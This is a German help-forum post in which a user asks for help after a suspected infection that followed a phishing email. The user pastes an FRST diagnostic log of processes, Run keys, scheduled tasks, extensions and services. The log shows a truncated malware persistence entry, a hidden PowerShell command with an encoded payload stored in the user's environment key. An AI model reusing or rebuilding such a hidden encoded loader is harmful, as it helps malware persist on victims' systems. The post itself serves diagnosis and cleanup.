Dieser Fund ist nach einer Email, angeblich aus Nigeria, in Outlook aufgetaucht. Habe Scans mit
Malwarebytes und AdwCleaner, EMSISoft ausgeführt. Eine Kernelisolierung habe ich nachträglich durchgeführt. Einmal habe ich mich über eine schnell hinter der Benutzerkontensteuerung auftauchende zusätzliche Benutzerkontensteuerung gewundert. Windows Defender hat diese beiden Bedrohungen erkannt und gelöscht.
FRST.txt:
Code:
Alles auswählen Aufklappen ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-02-2021
durchgeführt von Preso (Administrator) auf GIK (Gigabyte Technology Co., Ltd. H97-HD3) (04-02-2021 13:34:47)
Gestartet von C:\Downloads
Geladene Profile: Preso & elsewhere
Platform: Windows 10 Pro Version 20H2 19042.789 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Edge
Start-Modus: Normal
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) E:\Program Files (x86)\PDF24\pdf24.exe <2>
(GIGA-BYTE TECHNOLOGY CO., LTD. -> ) C:\Program Files (x86)\Gigabyte\AppCenter\ApCent.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Preso\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe <2>
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8844032 2019-03-27] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [PDFPrint] => E:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5866032 2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\RunOnce: [PreRun] => C:\Program Files (x86)\Gigabyte\AppCenter\PreRun.exe [8192 2013-04-29] () [Datei ist nicht signiert]
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <==== ACHTUNG
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <==== ACHTUNG
HKU\S-1-5-21-1399086370-1300056321-2305582902-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3421984 2020-12-07] (Valve -> Valve Corporation)
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\Run: [Opera Browser Assistant] => C:\Users\elsewhere\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [3154456 2020-11-25] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3144744 2021-01-21] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\Run: [BingWallpaperApp] => C:\Users\elsewhere\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe [10906504 2021-01-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\MountPoints2: {f02d426b-9e91-11ea-b5b0-806e6f6e6963} - "D:\FSetup.exe"
HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\Environment: [elsewhere] "powershell.exe" -windowstyle hidden -En "PAAjACAAZQBjAGcAYwBkAGYAdwBkAGsAZABvACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAw (Der Dateneintrag hat 1271 mehr Zeichen). <==== ACHTUNG
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\WINDOWS\system32\AdobePDF.dll [65496 2020-10-22] (Adobe Inc. -> Adobe Systems Inc)
HKLM\...\Print\Monitors\HP 5D12 Status Monitor: C:\WINDOWS\system32\hpinksts5D12LM.dll [332176 2012-09-12] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\88.0.4324.146\Installer\chrmstp.exe [2021-02-04] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{AC76BA86-0000-0000-7760-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat DC\Esl\Aiod.dll [2020-10-22] (Adobe Inc. -> Adobe Systems, Inc.)
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] ->
Startup: C:\Users\elsewhere\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\An OneNote senden.lnk [2020-12-29]
ShortcutTarget: An OneNote senden.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Beschränkung - Firefox <==== ACHTUNG
Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {02F51453-1B0A-47F9-B217-DD524EE24C7F} - System32\Tasks\Microsoft\Windows\End Of Support\Notify2 => C:\WINDOWS\system32\sipnotify.exe
Task: {0404189F-2334-40B3-AC6C-3F0F77493CF4} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {0814C0DF-8B8E-4632-8683-468D9FCD60A0} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {0BB8A075-953A-48A0-9003-C4FC49F05CD5} - System32\Tasks\{088E80EB-C214-41B6-ADF7-A6AC3CDBA58A} => C:\Program Files (x86)\EA GAMES\Battlefield 1942\BF1942.exe
Task: {13EA9AF5-5C2A-4473-AD0D-46BBFA8E51FB} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22993288 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {17A625DC-92A3-483B-88DE-7FD969AE98DD} - System32\Tasks\hpUtility.exe_{5861CF26-1358-4FEC-BBF6-D170B8174156} => C:\Program Files\HP\HP Officejet 6600\Bin\utils\hpUtility.exe
Task: {1C62F828-2CC9-47D2-8633-F440944E6E32} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22993288 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {1C679200-1DCF-4672-962B-0BBFAFC05F46} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {21667FAA-D0A6-486D-8FEA-D99807255D37} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {22DC847A-E0B7-4799-B392-51A75E0B5FD6} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2CD557D7-5530-4C77-AB32-71935936DE9A} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1126296 2021-02-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {2D3FCC55-CC3C-400F-A243-AE8BA73726B5} - \Microsoft\Windows\Setup\EOSNotify2 -> Keine Datei <==== ACHTUNG
Task: {2F5D9FB2-836C-40A8-A152-2847CD88C1A5} - System32\Tasks\Opera scheduled Autoupdate 1550529866 => C:\Users\elsewhere\AppData\Local\Programs\Opera\launcher.exe [1776280 2021-01-14] (Opera Software AS -> Opera Software)
Task: {306E8C31-5A87-4C1C-806C-5733F5E056E1} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {331EA8DE-F7DB-4F39-AECD-EDF13076CE08} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3A86507B-70A9-4EB9-B249-74DD8D1B0D58} - System32\Tasks\Opera scheduled assistant Autoupdate 1582813960 => C:\Users\elsewhere\AppData\Local\Programs\Opera\launcher.exe [1776280 2021-01-14] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\elsewhere\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {3C570F83-D3F6-49AE-BAC9-BDA30D966319} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-11-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {479E7434-EF1C-4CC0-BAEC-BE1286EF02EB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration => {343D770D-7788-47C2-B62A-B7C4CED925CB}
Task: {51CEF298-6DF0-4C71-9303-6D6D61A60F16} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {532DDD98-6A1F-47DA-9CB8-9751E746103A} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {566990DB-5241-4220-90C0-AB48E7F809D1} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls => {DFA14C43-F385-4170-99CC-1B7765FA0E4A}
Task: {5C588CFC-9DB2-4BA1-A5AE-77A84DE5874A} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {60CD4525-3919-4E56-AE79-AA1228BFED0F} - \Microsoft\Windows\Setup\EOSNotify -> Keine Datei <==== ACHTUNG
Task: {63A3E071-BECA-4283-A8E7-64F783DAC737} - System32\Tasks\{A3252BDD-29C0-4D58-8081-6D40ADCEC025} => C:\Program Files (x86)\EA GAMES\Battlefield 1942\BF1942.exe
Task: {68D445E5-6365-4482-8A54-2B1960CEA60E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {694CAE9D-E12C-4F38-8333-CFDD0200A754} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6A7E338A-E901-40BA-9B19-8E02066BFC87} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6C85FB7A-3288-4536-B7EE-E09B375616FF} - System32\Tasks\{F5D7D8B6-5AD2-4C9F-9C88-400A1A9B1189} => C:\Program Files (x86)\EA GAMES\BF1942\BF1942.exe
Task: {6F8FA908-1F84-4038-BC5E-B185C588974C} - System32\Tasks\{D9D8241D-9AA2-4E2E-AFD0-C5F11C4B5EC8} => D:\Autorun.exe
Task: {705F4F0F-7301-4782-8BE2-98E13F821593} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {721FDFA9-FC49-434B-92AF-7A0FDE049AE7} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {785048FB-A4BD-463C-AE96-76E3B9918895} - System32\Tasks\Microsoft\Windows\End Of Support\Notify1 => C:\WINDOWS\system32\sipnotify.exe
Task: {7AE2EDC7-0FE4-4361-9CD1-B1E4A5A73E1A} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {7DB2A6BC-8307-4102-9BA0-A2292ADFF47C} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_465_pepper.exe [1499704 2020-12-08] (Adobe Inc. -> Adobe)
Task: {808E7BB4-C6E4-4A5D-AA66-7806DD072E95} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {8E229771-8EAD-4A83-B7B3-31C8DF4289EE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-11-25] (Google LLC -> Google LLC)
Task: {9E0D75EA-2FE9-47F2-9D86-B19A75BFFB81} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {A3EFB2F8-50AD-41B2-8423-2A4EBA4A6842} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {AC5AFDD3-3A61-43E0-8C73-E2104675A5B1} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1710464 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {AD866BF5-71DF-4B7D-8363-DB772DC71445} - System32\Tasks\MAGIX PC Check & Tuning 2020 (Autopilot.exe) => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2020\Autopilot.exe [1754696 2019-07-22] (MAGIX Software GmbH -> simplitec GmbH)
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {B16F66A5-DA9D-4CB5-8EBB-F8AEBE529DE8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B342129E-193D-46A1-9E62-3335E66CC6FF} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {BB34261D-0995-4C27-8AF5-932F16057D8D} - System32\Tasks\MAGIX PC Check & Tuning 2020 => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2020\PCCT.exe [2449992 2019-07-22] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {BF86B44E-8BB0-4D73-94DE-E021AA68755D} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C293D3D4-D5FB-4BC2-AD61-79AD87D98B89} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {C6904846-0532-491C-BB5E-DA6030B1F9B2} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115048 2021-02-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {D2B28237-88D1-4EEA-9CFE-ABF003CED378} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.b4ede14763db4fa8b1c1d0cd8673921c\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe
Task: {D413A0EC-E464-4743-814B-39F0C057A04E} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-11-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {D9F365B1-8E0F-47CB-8DD0-5810C416D41E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-11-25] (Google LLC -> Google LLC)
Task: {DC0EFF95-2A0B-4C3D-AE61-A13B5631F895} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-12-08] (Adobe Inc. -> Adobe)
Task: {DE90A2F1-9D79-4B3E-81F9-B410CF9BBA15} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {DF5AA596-DA07-4D25-824D-8E70347AAFDC} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {E169BE4F-1B67-461B-AA06-4F01F61830CB} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E444C3FE-4F34-4220-B38D-8F045248FB80} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {EB33C401-862F-4205-9359-B4E81E4AD027} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1710464 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {ED254D34-3954-49C0-93CF-B3F21D6FA600} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115048 2021-02-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {EDCB9BB5-DFEB-4CF1-86AF-44543D7E7154} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [880 2020-09-25] () [Datei ist nicht signiert]
Task: {F02737AC-5869-4421-8DAE-630D623DC96F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {F2B660B5-62DC-41EC-9CB2-7DE662A7C630} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-05] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F9CA4566-90BB-4493-B117-DBF84C46CB0E} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {FBFBEACF-A7FF-434A-A97A-60F047819388} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693456 2020-12-29] (Mozilla Corporation -> Mozilla Foundation)
Task: {FC29CC08-56B6-4D83-8116-366979A6C3D0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2020 (Autopilot.exe).job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2020\Autopilot.exe C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2020\Gik\Preso-MAGIX PC Check & Tuning 2020 (Autopilot.exe
Task: C:\WINDOWS\Tasks\MAGIX PC Check & Tuning 2020.job => C:\Program Files (x86)\MAGIX\MAGIX PC Check & Tuning 2020\PCCT.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{97C1CA99-D5AA-4E7E-B38B-B9B9AF8C0848}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{B6A26B15-6E18-40FF-9D6E-E6B5E3592D09}: [DhcpNameServer] 192.168.1.1
Edge:
=======
Edge Notifications: HKU\S-1-5-21-1399086370-1300056321-2305582902-1001 -> hxxps://go.guidants.com
Edge DefaultProfile: Default
Edge Profile: C:\Users\Preso\AppData\Local\Microsoft\Edge\User Data\Default [2021-02-03]
FireFox:
========
FF DefaultProfile: bxuv9ruq.default
FF ProfilePath: C:\Users\Preso\AppData\Roaming\Mozilla\Firefox\Profiles\bxuv9ruq.default [2021-01-19]
FF ProfilePath: C:\Users\Preso\AppData\Roaming\Mozilla\Firefox\Profiles\7z25j1f3.default-release [2021-01-19]
FF HKLM\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2020-10-22]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.17@acrobat.adobe.com] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF HKU\S-1-5-21-1399086370-1300056321-2305582902-1001\...\Firefox\Extensions: [fdm_ffext@freedownloadmanager.org] - C:\ProgramData\Free Download Manager\Firefox\Extensions\2.1.13
FF Extension: (Free Download Manager extension) - C:\ProgramData\Free Download Manager\Firefox\Extensions\2.1.13 [2017-01-18] []
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll [2011-11-03] (Electronic Sports Network i Sverige AB -> ESN Social Software AB)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB) [Datei ist nicht signiert]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-02-04] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-12-08] (Adobe Inc. -> Adobe)
S2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2019-02-16] (BitRaider LLC -> BitRaider, LLC)
S2 cjpcsc; C:\WINDOWS\SysWOW64\cjpcsc.exe [619464 2020-07-27] (Reiner Kartengeraete GmbH und Co.KG -> REINER SCT)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8902024 2021-01-22] (Microsoft Corporation -> Microsoft Corporation)
S2 DirMngr; C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe [216576 2015-11-24] () [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [803440 2019-11-12] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 gadjservice; C:\Program Files (x86)\Gigabyte\AppCenter\AdjustService.exe [16896 2015-04-14] () [Datei ist nicht signiert]
S3 KSDE1.0.0; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Secure Connection 1.0\ksde.exe [241544 2016-06-28] (Kaspersky Lab -> AO Kaspersky Lab)
